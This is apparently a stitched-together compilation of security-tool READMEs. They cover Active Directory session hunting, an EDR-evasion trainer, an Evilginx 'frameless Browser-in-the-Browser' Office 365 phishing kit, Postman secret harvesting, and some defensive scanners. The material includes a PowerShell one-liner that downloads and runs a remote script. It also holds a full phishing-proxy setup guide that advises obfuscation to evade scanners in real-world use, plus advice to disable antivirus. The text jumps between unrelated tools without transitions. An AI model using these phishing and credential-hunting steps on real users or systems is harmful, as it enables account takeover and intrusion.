It's important to note that the remote registry service needs to be running on the remote computer for the tool to work effectively. In my tests, if the service is stopped but its Startup type is configured to "Automatic" or "Manual", the service will start automatically on the target computer once queried (this is native behavior), and sessions information will be retrieved. If set to "Disabled" no session information can be retrieved from the target.
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-SessionHunter/main/Invoke-SessionHunter.ps1')
If run without parameters or switches it will retrieve active sessions for all computers in the current domain by querying the registry
Invoke-SessionHunter
Gather sessions by authenticating to targets where you have local admin access
Invoke-SessionHunter -CheckAsAdmin
You can optionally provide credentials in the following format
Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!"
You can also use the -FailSafe switch, which will direct the tool to proceed if the target remote registry becomes unresponsive.
This works in cobination with -Timeout | Default = 2, increase for slower networks.
Invoke-SessionHunter -FailSafe
Invoke-SessionHunter -FailSafe -Timeout 5
Use the -Match switch to show only targets where you have admin access and a privileged user is logged in
Invoke-SessionHunter -Match
All switches can be combined
Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!" -FailSafe -Timeout 5 -Match
Invoke-SessionHunter -Domain contoso.local
Invoke-SessionHunter -Targets "DC01,Workstation01.contoso.local"
Invoke-SessionHunter -Targets c:\Users\Public\Documents\targets.txt
Invoke-SessionHunter -Servers
Invoke-SessionHunter -Workstations
Invoke-SessionHunter -Hunt "Administrator"
Invoke-SessionHunter -IncludeLocalHost
Invoke-SessionHunter -RawResults
Note: if a host is not reachable it will hang for a while
Invoke-SessionHunter -NoPortScan
HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN, NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. Hardening Meter supports all Linux distributions and machine-readable output, the results can be printed to the screen a table format or be exported to a csv. (For more information see Documentation.md file)
Scan the '/usr/bin' directory, the '/usr/sbin/newusers' file, the system and export the results to a csv file.
python3 HardeningMeter.py -f /bin/cp -s
Before installing HardeningMeter, make sure your machine has the following: 1. readelf
and file
commands 2. python version 3 3. pip 4. tabulate
pip install tabulate
The very latest developments can be obtained via git.
Clone or download the project files (no compilation nor installation is required)
git clone https://github.com/OfriOuzan/HardeningMeter
Specify the files you want to scan, the argument can get more than one file seperated by spaces.
Specify the directory you want to scan, the argument retrieves one directory and scan all ELF files recursively.
Specify whether you want to add external checks (False by default).
Prints according to the order, only those files that are missing security hardening mechanisms and need extra attention.
Specify if you want to scan the system hardening methods.
Specify if you want to save the results to csv file (results are printed as a table to stdout by default).
HardeningMeter's results are printed as a table and consisted of 3 different states: - (X) - This state indicates that the binary hardening mechanism is disabled. - (V) - This state indicates that the binary hardening mechanism is enabled. - (-) - This state indicates that the binary hardening mechanism is not relevant in this particular case.
When the default language on Linux is not English make sure to add "LC_ALL=C" before calling the script.
CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.
Detection | Description |
---|---|
Direct Syscall | Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks. |
NTDLL Unhooking | Identifies attempts to unhook functions within the NTDLL library, a common evasion technique. |
AMSI Patch | Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis. |
ETW Patch | Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection. |
PE Stomping | Identifies instances of PE (Portable Executable) stomping. |
Reflective PE Loading | Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis. |
Unbacked Thread Origin | Identifies threads originating from unbacked memory regions, often indicative of malicious activity. |
Unbacked Thread Start Address | Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection. |
API hooking | Places a hook on the NtWriteVirtualMemory function to monitor memory modifications. |
Custom Pattern Search | Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures. |
To get started with CrimsonEDR, follow these steps:
bash sudo apt-get install gcc-mingw-w64-x86-64
bash git clone https://github.com/Helixo32/CrimsonEDR
bash cd CrimsonEDR; chmod +x compile.sh; ./compile.sh
Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.
To use CrimsonEDR, follow these steps:
ioc.json
file is placed in the current directory from which the executable being monitored is launched. For example, if you launch your executable to monitor from C:\Users\admin\
, the DLL will look for ioc.json
in C:\Users\admin\ioc.json
. Currently, ioc.json
contains patterns related to msfvenom
. You can easily add your own in the following format:{
"IOC": [
["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
]
}
Execute CrimsonEDRPanel.exe
with the following arguments:
-d <path_to_dll>
: Specifies the path to the CrimsonEDR.dll
file.
-p <process_id>
: Specifies the Process ID (PID) of the target process where you want to inject the DLL.
For example:
.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234
Here are some useful resources that helped in the development of this project:
For questions, feedback, or support, please reach out to me via:
A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.
This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.
Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. βΆ Watch Video
βοΈ Buy Me A Coffee
This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.
Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.
That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.
The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.
In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.
A Browser In The Browser (BITB) without any iframes! As simple as that.
Meaning that we can now use BITB with Evilginx on websites like Microsoft.
Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.
Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.
Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)
Update and Upgrade system packages:
sudo apt update && sudo apt upgrade -y
Create a new evilginx user, and add user to sudo group:
sudo su
adduser evilginx
usermod -aG sudo evilginx
Test that evilginx user is in sudo group:
su - evilginx
sudo ls -la /root
Navigate to users home dir:
cd /home/evilginx
(You can do everything as sudo user as well since we're running everything locally)
Download and build Evilginx: Official Docs
Copy Evilginx files to /home/evilginx
Install Go: Official Docs
wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile
ADD: export PATH=$PATH:/usr/local/go/bin
source ~/.profile
Check:
go version
Install make:
sudo apt install make
Build Evilginx:
cd /home/evilginx/evilginx2
make
Create a new directory for our evilginx build along with phishlets and redirectors:
mkdir /home/evilginx/evilginx
Copy build, phishlets, and redirectors:
cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx
cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors
cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets
Ubuntu firewall quick fix (thanks to @kgretzky)
sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx
On Ubuntu, if you get Failed to start nameserver on: :53
error, try modifying this file
sudo nano /etc/systemd/resolved.conf
edit/add the DNSStubListener
to no
> DNSStubListener=no
then
sudo systemctl restart systemd-resolved
Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.
nano ~/.evilginx/config.json
CHANGE https_port
from 443
to 8443
Install Apache2:
sudo apt install apache2 -y
Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)
sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat
Start and enable Apache:
sudo systemctl start apache2
sudo systemctl enable apache2
Try if Apache and VM networking works by visiting the VM's IP from a browser on the host machine.
Install git if not already available:
sudo apt -y install git
Clone this repo:
git clone https://github.com/waelmas/frameless-bitb
cd frameless-bitb
Make directories for the pages we will be serving:
sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary
Copy the directories for each page:
sudo cp -r ./pages/home/ /var/www/
sudo cp -r ./pages/primary/ /var/www/
sudo cp -r ./pages/secondary/ /var/www/
Optional: Remove the default Apache page (not used):
sudo rm -r /var/www/html/
Copy the O365 phishlet to phishlets directory:
sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml
Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js
and change the CALENDLY_PAGE_NAME
and CALENDLY_EVENT_TYPE
.
Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html
in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.
Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.
We will use the domain fake.com
which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)
Create dir and parents if they do not exist:
sudo mkdir -p /etc/ssl/localcerts/fake.com/
Generate the SSL certs using the OpenSSL config file:
sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
-config openssl-local.cnf
Modify private key permissions:
sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem
Copy custom substitution files (the core of our approach):
sudo cp -r ./custom-subs /etc/apache2/custom-subs
Important Note: In this repo I have included 2 substitution configs for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode and they should act as base templates to achieve the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of two or implement your own logic for automatic switching.
Both config files under /apache-configs/
are the same, only with a different Include directive used for the substitution file that will be included. (there are 2 references for each file)
# Uncomment the one you want and remember to restart Apache after any changes:
#Include /etc/apache2/custom-subs/win-chrome.conf
Include /etc/apache2/custom-subs/mac-chrome.conf
Simply to make it easier, I included both versions as separate files for this next step.
Windows/Chrome BITB:
sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf
Mac/Chrome BITB:
sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf
Test Apache configs to ensure there are no errors:
sudo apache2ctl configtest
Restart Apache to apply changes:
sudo systemctl restart apache2
Get the IP of the VM using ifconfig
and note it somewhere for the next step.
We now need to add new entries to our hosts file, to point the domain used in this demo fake.com
and all used subdomains to our VM on which Apache and Evilginx are running.
On Windows:
Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)
Click on the File option (top-left) and in the File Explorer address bar, copy and paste the following:
C:\Windows\System32\drivers\etc\
Change the file types (bottom-right) to "All files".
Double-click the file named hosts
On Mac:
Open a terminal and run the following:
sudo nano /private/etc/hosts
Now modify the following records (replace [IP]
with the IP of your VM) then paste the records at the end of the hosts file:
# Local Apache and Evilginx Setup
[IP] login.fake.com
[IP] account.fake.com
[IP] sso.fake.com
[IP] www.fake.com
[IP] portal.fake.com
[IP] fake.com
# End of section
Save and exit.
Now restart your browser before moving to the next step.
Note: On Mac, use the following command to flush the DNS cache:
sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder
This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlet get-hosts [PHISHLET_NAME]
but remember to replace the 127.0.0.1
with the actual local IP of your VM.
Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com
so we need to make our host machine trust the certificate authority that signed the SSL certs.
For this step, it's easier to follow the video instructions, but here is the gist anyway.
Open https://fake.com/ in your Chrome browser.
Ignore the Unsafe Site warning and proceed to the page.
Click the SSL icon > Details > Export Certificate IMPORTANT: When saving, the name MUST end with .crt for Windows to open it correctly.
Double-click it > install for current user. Do NOT select automatic, instead place the certificate in specific store: select "Trusted Route Certification Authorities".
On Mac: to install for current user only > select "Keychain: login" AND click on "View Certificates" > details > trust > Always trust
Now RESTART your Browser
You should be able to visit https://fake.com
now and see the homepage without any SSL warnings.
At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.
Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)
sudo apt install tmux -y
Start Evilginx in developer mode (using tmux to avoid losing the session):
tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer
(To re-attach to the tmux session use tmux attach-session -t evilginx
)
Evilginx Config:
config domain fake.com
config ipv4 127.0.0.1
IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.
blacklist noadd
Setup Phishlet and Lure:
phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0
Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).
Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB
Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery
My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg
How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation
Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/
Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconaissance / OSINT framework for Postman. While existing tools are great proof of concepts, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration to recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false-positives that still provided offensive value.
Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:
python3 -m pip install porch-pirate
The Porch Pirate client can be used to nearly fully conduct reviews on public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.
Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.
--globals
--collections
--requests
--urls
--dump
--raw
--curl
porch-pirate -s "coca-cola.com"
By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w
argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8
When an interesting result has been found with a simple search, we can provide the workspace ID to the -w
argument with the --dump
command to begin extracting information from the workspace and its collections.
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump
Porch Pirate can be supplied a simple search term, following the --globals
argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.
porch-pirate -s "shopify" --globals
Porch Pirate can be supplied a simple search term, following the --dump
argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.
porch-pirate -s "coca-cola.com" --dump
A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls
Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.
porch-pirate -s "coca-cola.com" --urls
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw
porch-pirate -w WORKSPACE_ID
porch-pirate -c COLLECTION_ID
porch-pirate -r REQUEST_ID
porch-pirate -u USERNAME/TEAMNAME
Porch Pirate can build curl requests when provided with a request ID for easier testing.
porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl
porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080
p = porchpirate()
print(p.search('coca-cola.com'))
p = porchpirate()
print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
requests = collection['requests']
for r in requests:
request_data = p.request(r['id'])
print(request_data)
p = porchpirate()
print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
Other library usage examples can be located in the examples
directory, which contains the following examples:
dump_workspace.py
format_search_results.py
format_workspace_collections.py
format_workspace_globals.py
get_collection.py
get_collections.py
get_profile.py
get_request.py
get_statistics.py
get_team.py
get_user.py
get_workspace.py
recursive_globals_from_search.py
request_to_curl.py
search.py
search_by_page.py
workspace_collections.py
Permiso: https://permiso.io
Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments
CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.
To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.
bash pip3 install -r requirements.txt
To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.
bash chmod +x clone.sh ./clone.sh
This tool offers a CLI (Command Line Interface). As such, here we review its use:
Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:
Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.
{
"AWS": [
{
"bucket": "cloudtrail-logs-00000000-ffffff",
"prefix": [
"testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
"testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
]
},
{
"bucket": "aws-kosova-us-east-1-00000000"
}
],
"AZURE": [
{
"accountname": "logs",
"container": [
"cloudgrappler"
]
}
]
}
Run command
python3 main.py
python3 main.py -p
[+] Running GetFileDownloadUrls.*secrets_ for AWS
[+] Threat Actor: LUCR3
[+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers.This however may be a part of your normal business use case.
python3 main.py -p -jo
reports
βββ json
βββ AWS
βΒ Β βββ 2024-03-04 01:01 AM
βΒ Β βββ cloudtrail-logs-00000000-ffffff--
βΒ Β βββ testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
βΒ Β βββ GetFileDownloadUrls.*secrets_.json
βββ AZURE
βββ 2024-03-04 01:01 AM
βββ logs
βββ cloudgrappler
βββ okta_key.json
python3 main.py -p -sd 2024-02-15 -ed 2024-02-16
python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'
python3 main.py -f new_file.json
Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.
If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.
The simplest way to authenticate with Azure is to first run:
az login
This will open a browser window and prompt you to login to Azure.
ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.
~ Hilali Abdel
USAGE
python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]
[Add new Device]
python3 smartthings.py -a 192.168.1.1
python3 smarthings.py -s --type TPLINK
python3 smartthings.py -s --firmware TP-Link Archer C7v2
Search for CVE and Poc [ firmware and device type]
Scan device for open upnp ports
python3 smartthings.py -s --scan upnp --id
get data from mqtt 'subscribe'
python3 smartthings.py -s --scan mqtt --id
This tool takes a scanning tool's output file, and converts it to a tabular format (CSV, XLSX, or text table). This tool can process output from the following tools:
This tool can offer a human-readable, tabular format which you can tie to any observations you have drafted in your report. Why? Because then your reviewers can tell that you, the pentester, investigated all found open ports, and looked at all scanning reports.
Using Pip:
pip install --user sr2t
You can use sr2t
in two ways:
sr2t --help
.python -m src.sr2t --help
$ sr2t --help
usage: sr2t [-h] [--nessus NESSUS [NESSUS ...]] [--nmap NMAP [NMAP ...]]
[--nikto NIKTO [NIKTO ...]] [--dirble DIRBLE [DIRBLE ...]]
[--testssl TESTSSL [TESTSSL ...]]
[--fortify FORTIFY [FORTIFY ...]] [--nmap-state NMAP_STATE]
[--nmap-services] [--no-nessus-autoclassify]
[--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE]
[--nessus-tls-file NESSUS_TLS_FILE]
[--nessus-x509-file NESSUS_X509_FILE]
[--nessus-http-file NESSUS_HTTP_FILE]
[--nessus-smb-file NESSUS_SMB_FILE]
[--nessus-rdp-file NESSUS_RDP_FILE]
[--nessus-ssh-file NESSUS_SSH_FILE]
[--nessus-min-severity NESSUS_MIN_SEVERITY]
[--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH]
[--nessus-sort-by NESSUS_SORT_BY]
[--nikto-description-width NIKTO_DESCRIPTION_WIDTH]< br/> [--fortify-details] [--annotation-width ANNOTATION_WIDTH]
[-oC OUTPUT_CSV] [-oT OUTPUT_TXT] [-oX OUTPUT_XLSX]
[-oA OUTPUT_ALL]
Converting scanning reports to a tabular format
optional arguments:
-h, --help show this help message and exit
--nmap-state NMAP_STATE
Specify the desired state to filter (e.g.
open|filtered).
--nmap-services Specify to ouput a supplemental list of detected
services.
--no-nessus-autoclassify
Specify to not autoclassify Nessus results.
--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE
Specify to override a custom Nessus autoclassify YAML
file.
--nessus-tls-file NESSUS_TLS_FILE
Specify to override a custom Nessus TLS findings YAML
file.
--nessus-x509-file NESSUS_X509_FILE
Specify to override a custom Nessus X.509 findings
YAML file.
--nessus-http-file NESSUS_HTTP_FILE
Specify to override a custom Nessus HTTP findings YAML
file.
--nessus-smb-file NESSUS_SMB_FILE
Specify to override a custom Nessus SMB findings YAML
file.
--nessus-rdp-file NESSUS_RDP_FILE
Specify to override a custom Nessus RDP findings YAML
file.
--nessus-ssh-file NESSUS_SSH_FILE
Specify to override a custom Nessus SSH findings YAML
file.
--nessus-min-severity NESSUS_MIN_SEVERITY
Specify the minimum severity to output (e.g. 1).
--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH
Specify the width of the pluginid column (e.g. 30).
--nessus-sort-by NESSUS_SORT_BY
Specify to sort output by ip-address, port, plugin-id,
plugin-name or severity.
--nikto-description-width NIKTO_DESCRIPTION_WIDTH
Specify the width of the description column (e.g. 30).
--fortify-details Specify to include the Fortify abstracts, explanations
and recommendations for each vulnerability.
--annotation-width ANNOTATION_WIDTH
Specify the width of the annotation column (e.g. 30).
-oC OUTPUT_CSV, --output-csv OUTPUT_CSV
Specify the output CSV basename (e.g. output).
-oT OUTPUT_TXT, --output-txt OUTPUT_TXT
Specify the output TXT file (e.g. output.txt).
-oX OUTPUT_XLSX, --output-xlsx OUTPUT_XLSX
Specify the outpu t XLSX file (e.g. output.xlsx). Only
for Nessus at the moment
-oA OUTPUT_ALL, --output-all OUTPUT_ALL
Specify the output basename to output to all formats
(e.g. output).
specify at least one:
--nessus NESSUS [NESSUS ...]
Specify (multiple) Nessus XML files.
--nmap NMAP [NMAP ...]
Specify (multiple) Nmap XML files.
--nikto NIKTO [NIKTO ...]
Specify (multiple) Nikto XML files.
--dirble DIRBLE [DIRBLE ...]
Specify (multiple) Dirble XML files.
--testssl TESTSSL [TESTSSL ...]
Specify (multiple) Testssl JSON files.
--fortify FORTIFY [FORTIFY ...]
Specify (multiple) HP Fortify FPR files.
A few examples
To produce an XLSX format:
$ sr2t --nessus example/nessus.nessus --no-nessus-autoclassify -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --nessus example/nessus.nessus
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| host | port | plugin id | plugin name | severity | annotations |
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| 192.168.142.4 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.4 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.4 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| 192.168.142.4 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| 192.168.142.4 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| 192.168.142.4 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.4 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.4 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.4 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| 192.168.142.4 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.4 | 3389 | 51192 | SSL Certificate Can not Be Trusted | 2 | X |
| 192.168.142.2 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.2 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.2 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| 192.168.142.2 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| 192.168.142.2 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| 192.168.142.2 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.2 | 3389 | 45411 | S SL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.2 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.2 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| 192.168.142.2 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.2 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |
| 192.168.142.2 | 445 | 57608 | SMB Signing not required | 2 | X |
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
Or to output a CSV file:
$ sr2t --nessus example/nessus.nessus -oC example
$ cat example_nessus.csv
host,port,plugin id,plugin name,severity,annotations
192.168.142.4,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.4,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.4,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
